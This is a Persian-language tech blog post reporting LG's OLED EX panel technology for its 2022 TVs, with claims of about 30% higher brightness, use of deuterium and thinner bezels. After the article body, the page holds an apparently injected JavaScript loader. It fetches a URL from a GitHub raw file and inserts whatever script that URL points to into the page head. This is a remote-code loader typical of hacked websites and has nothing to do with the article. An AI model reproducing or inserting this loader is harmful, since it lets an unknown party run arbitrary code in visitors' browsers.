دسته‌بندی نشده

تقویت روشنایی نمایشگر های OLED در 2022 با تکنولوژی OLED-EX

الجی کمپانی مشهور جهانی است که تلویزیون های بی نظیر OLED زیادی را به بازار عرضه کرده است. این تلویزیون محبوبیت و شهرت بسیار زیادی در بین کاربران دارد به همین دلیل زمانی که این برند در مورد ارتقا و تقویت پنل خود صحبت می کند توجه به ان ضروری است. ال جی به تازگی درباره جدید ترین تکنولوژی برای پنل های OLED صحبت کرده است و قصد دارد با بکارگیری تکنولوژی جدید OLED EX در سال 2022 روشنایی تلویزیون را ارتقا دهد. به گفته این کمپانی با این تکنولوژی سطح روشنایی پنل در حدود 30 درصد افزایش پیدا خواهد کرد و برای تلویزیون های جدید حاشیه های باریک تر و دقت تصاویر بالاتری ارائه می شود.
این ویژگی های ارتقا یافته با استفاده از تغییر دو اصل مهم انجام می گیرند. اولین تغییر استفاده از یک المت به نام دوتریوم است و تغییر دوم تلفیقی از پردازنده تصاویر الگوریتمی می باشد. پیشبینی ها بر این است که در این پنل ها میزان استفاده از دیود نورگسیل فردی بستگی به عادت های تماشایی کاربر و محتویاتی که به صورت روزمره نگاه می کنند دارد. با این ویژگی مصرف انرژی روی نماشگر کنترل می شود و تجربه درستی از جزِئیات و رنگ های ویدیو ها ایجاد می شود. 

به گفته الجی تلویزیون های OLED EX حاشیه های بسیار باریکی دارند. این پنل قرار است در سایز 65 اینچ قطر حاشیه ها را از 6 میلی متر تا 4 میلی متر کاهش دهد.

LG می گوید قرار است که تکنولوژی OLED EX را در تمامی تلویزیون های اولد سال 2022 استفاده کند
تمامی ویژگی های بیان شده توسط این کمپانی خوب و مناسب به نظر می رسند اما برای اطلاع درست تر از این پنل ها 2022 باید منتظر عرضه ان ها و بررسی دقیق تر ان ها باشیم. 
(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *